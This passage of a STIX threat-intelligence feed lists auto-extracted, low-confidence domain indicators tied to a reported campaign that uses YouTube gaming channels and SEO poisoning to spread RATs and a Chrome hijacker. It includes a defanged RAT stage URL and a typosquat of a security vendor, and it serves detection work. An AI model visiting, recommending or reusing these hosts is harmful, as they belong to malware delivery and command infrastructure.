cabbagemeasure[","pattern":"[domain-name:value = 'branchmorning.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d1055e7d-bfb9-40e0-8510-c29425cbbc52","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: breathdoctor.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ndarychickens[.]xyz ; boytank[.]xyz ; branchmorning[.]xyz ; breathdoctor[.]xyz ; bubbleslip[.]xyz ; cabbagemeasure[.]xyz ; cablecanvas[.","pattern":"[domain-name:value = 'breathdoctor.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7a42fefc-c75e-4e54-ac84-36bc28d1ff1c","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: bubbleappliance.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: .believesisters[.]xyz ; connect.boundaryfly[.]xyz ; connect.bubbleappliance[.]xyz ; connect.cableland[.]xyz ; connect.chinexpert[.]xyz ; co","pattern":"[domain-name:value = 'bubbleappliance.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--3e0526dc-d863-4361-a3eb-4e64fefc7d5e","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: bubbleslip.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: boytank[.]xyz ; branchmorning[.]xyz ; breathdoctor[.]xyz ; bubbleslip[.]xyz ; cabbagemeasure[.]xyz ; cablecanvas[.]xyz ; cardgrape[.]","pattern":"[domain-name:value = 'bubbleslip.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f1483590-dbca-4b10-8dc7-e0e0c6fc4ec1","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: cabbagemeasure.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: anchmorning[.]xyz ; breathdoctor[.]xyz ; bubbleslip[.]xyz ; cabbagemeasure[.]xyz ; cablecanvas[.]xyz ; cardgrape[.]xyz ; cattlegold[.]xyz","pattern":"[domain-name:value = 'cabbagemeasure.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9d709a35-25cd-4faf-9445-096417b010d0","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: cablecanvas.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: athdoctor[.]xyz ; bubbleslip[.]xyz ; cabbagemeasure[.]xyz ; cablecanvas[.]xyz ; cardgrape[.]xyz ; cattlegold[.]xyz ; celeryerror[.]xyz","pattern":"[domain-name:value = 'cablecanvas.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5eaa784e-17d9-4f24-9ce6-239a8e269c19","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: cableland.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: boundaryfly[.]xyz ; connect.bubbleappliance[.]xyz ; connect.cableland[.]xyz ; connect.chinexpert[.]xyz ; connect.conditiongrade[.]xyz","pattern":"[domain-name:value = 'cableland.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bd45042c-2e96-40d7-bfd4-15f5fbf7b21b","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: cardgrape.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: bbleslip[.]xyz ; cabbagemeasure[.]xyz ; cablecanvas[.]xyz ; cardgrape[.]xyz ; cattlegold[.]xyz ; celeryerror[.]xyz ; centscarf[.]xyz","pattern":"[domain-name:value = 'cardgrape.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d36942f0-e3f7-4f16-8532-4e2b0ef23e00","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: cattlegold.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: abbagemeasure[.]xyz ; cablecanvas[.]xyz ; cardgrape[.]xyz ; cattlegold[.]xyz ; celeryerror[.]xyz ; centscarf[.]xyz CL-CRI-1171 gate an","pattern":"[domain-name:value = 'cattlegold.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e4a5a4ec-598f-44f0-83ec-f14c528355ee","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: celeryerror.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ; cablecanvas[.]xyz ; cardgrape[.]xyz ; cattlegold[.]xyz ; celeryerror[.]xyz ; centscarf[.]xyz CL-CRI-1171 gate and landing infrastruc","pattern":"[domain-name:value = 'celeryerror.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--44e7e4e8-8072-465b-8041-131824f20ea9","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: centscarf.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ; cardgrape[.]xyz ; cattlegold[.]xyz ; celeryerror[.]xyz ; centscarf[.]xyz CL-CRI-1171 gate and landing infrastructure Domain chalkp","pattern":"[domain-name:value = 'centscarf.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bd7790b1-3256-4b7f-a542-b2d3cbce05d7","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: chalkprose.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: rf[.]xyz CL-CRI-1171 gate and landing infrastructure Domain chalkprose[.]xyz ; cherriestruck[.]space ; chesstail[.]xyz ; chickensmine[","pattern":"[domain-name:value = 'chalkprose.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d235e97d-7049-46a2-8780-601611d856f7","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: chawton.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: tructure Domain voyagemist[.]space ; statementtouch[.]xyz ; chawton[.]info OfferLoader payload handoff and second-stage hosts Domain","pattern":"[domain-name:value = 'chawton.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9e2a81bc-ff5d-4c44-a58f-55e0a489ec5a","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: cherriestruck.space","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: 1 gate and landing infrastructure Domain chalkprose[.]xyz ; cherriestruck[.]space ; chesstail[.]xyz ; chickensmine[.]space ; churchpail[.]x","pattern":"[domain-name:value = 'cherriestruck.space']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--71d2024e-d666-45c1-bd06-fdc00e34e811","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: chesstail.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: structure Domain chalkprose[.]xyz ; cherriestruck[.]space ; chesstail[.]xyz ; chickensmine[.]space ; churchpail[.]xyz ; clothcrib[.]x","pattern":"[domain-name:value = 'chesstail.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6c42cfde-60be-4c39-9dd2-e796ba2e3d47","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: chickensmine.space","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: halkprose[.]xyz ; cherriestruck[.]space ; chesstail[.]xyz ; chickensmine[.]space ; churchpail[.]xyz ; clothcrib[.]xyz ; clothcurrent[.]xyz","pattern":"[domain-name:value = 'chickensmine.space']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b51d44bc-ee47-43e0-b8f3-09c88facfb32","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: chinexpert.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: t.bubbleappliance[.]xyz ; connect.cableland[.]xyz ; connect.chinexpert[.]xyz ; connect.conditiongrade[.]xyz ; connect.coppersummer[.]x","pattern":"[domain-name:value = 'chinexpert.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--10e8748c-463e-4354-995e-fb511edfe4f1","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: churchpail.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: iestruck[.]space ; chesstail[.]xyz ; chickensmine[.]space ; churchpail[.]xyz ; clothcrib[.]xyz ; clothcurrent[.]xyz ; coatberry[.]xyz","pattern":"[domain-name:value = 'churchpail.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1217e914-d3a1-421e-9252-00f442d13160","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: clothcrib.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: chesstail[.]xyz ; chickensmine[.]space ; churchpail[.]xyz ; clothcrib[.]xyz ; clothcurrent[.]xyz ; coatberry[.]xyz CL-CRI-1171 gate a","pattern":"[domain-name:value = 'clothcrib.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2657a7c2-5e0d-47fb-85f0-ce0c039c7c1c","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: clothcurrent.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: chickensmine[.]space ; churchpail[.]xyz ; clothcrib[.]xyz ; clothcurrent[.]xyz ; coatberry[.]xyz CL-CRI-1171 gate and landing infrastruc","pattern":"[domain-name:value = 'clothcurrent.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b79ecd73-dd1c-4d88-8f5b-bab941e183bc","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: coatberry.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ; churchpail[.]xyz ; clothcrib[.]xyz ; clothcurrent[.]xyz ; coatberry[.]xyz CL-CRI-1171 gate and landing infrastructure Domain connec","pattern":"[domain-name:value = 'coatberry.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--a18db3bb-8400-4fa6-b5ce-94fa241ebc38","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: collartitle.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ect.fuelleg[.]info ; vesselsystem[.]xyz ; minewave[.]info ; collartitle[.]info ; boardmagic[.]info ; placespoon[.]xyz ; needcherries[.]o","pattern":"[domain-name:value = 'collartitle.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--79d6a7ea-52c4-4a77-bb20-a42ee515bcd0","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: conditiongrade.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: onnect.cableland[.]xyz ; connect.chinexpert[.]xyz ; connect.conditiongrade[.]xyz ; connect.coppersummer[.]xyz ; connect.creatorcreator[.]x","pattern":"[domain-name:value = 'conditiongrade.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e594dbd5-636a-460d-881e-a8befef6b439","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: coppersummer.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: t.chinexpert[.]xyz ; connect.conditiongrade[.]xyz ; connect.coppersummer[.]xyz ; connect.creatorcreator[.]xyz ; connect.dresstent[.]xyz","pattern":"[domain-name:value = 'coppersummer.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c1aa83bd-2822-41c9-805c-186e6734f963","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: creatorcreator.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: conditiongrade[.]xyz ; connect.coppersummer[.]xyz ; connect.creatorcreator[.]xyz ; connect.dresstent[.]xyz ; connect.dropjeans[.]xyz ; con","pattern":"[domain-name:value = 'creatorcreator.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ed1c700c-d554-4af6-b361-4da9e4c74915","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: crowdstri.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: cript host Domain stryper[.]info ; aa.amazingshield[.]xyz ; crowdstri[.]com Insomnia RAT stage hosts and Python-agent C2 typosquat Do","pattern":"[domain-name:value = 'crowdstri.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--7ac6e631-c8d2-46ba-94d5-fe9131ec3620","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: drelto.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: 6546.py Stage-three Python Insomnia RAT agent URL hxxps[:]//drelto[.]info/farlix Search-result injection script host Domain stryper","pattern":"[domain-name:value = 'drelto.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--cdb0ec6f-9b5d-4ad6-a394-9a83ff592c4a","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: dresstent.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: coppersummer[.]xyz ; connect.creatorcreator[.]xyz ; connect.dresstent[.]xyz ; connect.dropjeans[.]xyz ; connect.edgeplayground[.]xyz","pattern":"[domain-name:value = 'dresstent.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e58b156d-cd37-4815-9818-128f9fab9b8f","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: dropjeans.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ct.creatorcreator[.]xyz ; connect.dresstent[.]xyz ; connect.dropjeans[.]xyz ; connect.edgeplayground[.]xyz ; connect.exchangeclub[.]x","pattern":"[domain-name:value = 'dropjeans.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b2b3f796-1ddb-4995-9be8-ed12ff5deb4c","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: edgeplayground.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: connect.dresstent[.]xyz ; connect.dropjeans[.]xyz ; connect.edgeplayground[.]xyz ; connect.exchangeclub[.]xyz CL-CRI-1171 installation-tra","pattern":"[domain-name:value = 'edgeplayground.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--18a4402d-6a49-49e8-85b5-f1ad89bd2f1a","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: exchangeclub.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ct.dropjeans[.]xyz ; connect.edgeplayground[.]xyz ; connect.exchangeclub[.]xyz CL-CRI-1171 installation-tracker infrastructure Domain co","pattern":"[domain-name:value = 'exchangeclub.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--37ef13e8-38d8-4d12-85ca-e03d45f820bd","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: existencediscussion.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: CRI-1171 installation-tracker infrastructure Domain connect.existencediscussion[.]info ; connect.expansionsalt[.]info ; connect.fangstitch[.]xyz","pattern":"[domain-name:value = 'existencediscussion.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--72226b34-8150-48a3-b4ce-b45805706dd9","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: expansionsalt.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ructure Domain connect.existencediscussion[.]info ; connect.expansionsalt[.]info ; connect.fangstitch[.]xyz ; connect.fogparcel[.]info ; c","pattern":"[domain-name:value = 'expansionsalt.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--95096eeb-7890-46fc-83cd-e1c06b006b5c","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: extentrack.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: Domain vendralo[.]info ; finersto[.]com ; mqsearch[.]com ; extentrack[.]com ; drelto[.]info Docro Hijacker rule delivery, telemetry,","pattern":"[domain-name:value = 'extentrack.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--6ce209d0-4449-4db2-a231-972af3e1c462","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: filescloud.pro","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: xspace[.]com ; ikx.filexspace[.]com ; filexstorage[.]site ; filescloud[.]pro ; zippyfiles[.]net ; mifilesx[.]site ; dw.xrsdownload[.]c","pattern":"[domain-name:value = 'filescloud.pro']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--42c2181e-0ebe-43ca-838e-1e22efeae857","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-15T22:15:19.967Z","created_by_ref":"identity--114eb48e-e466-4592-a55a-19018ab2acb6","name":"domain: filexspace.com","description":"Seen in \"Hackers Abuse YouTube Gaming 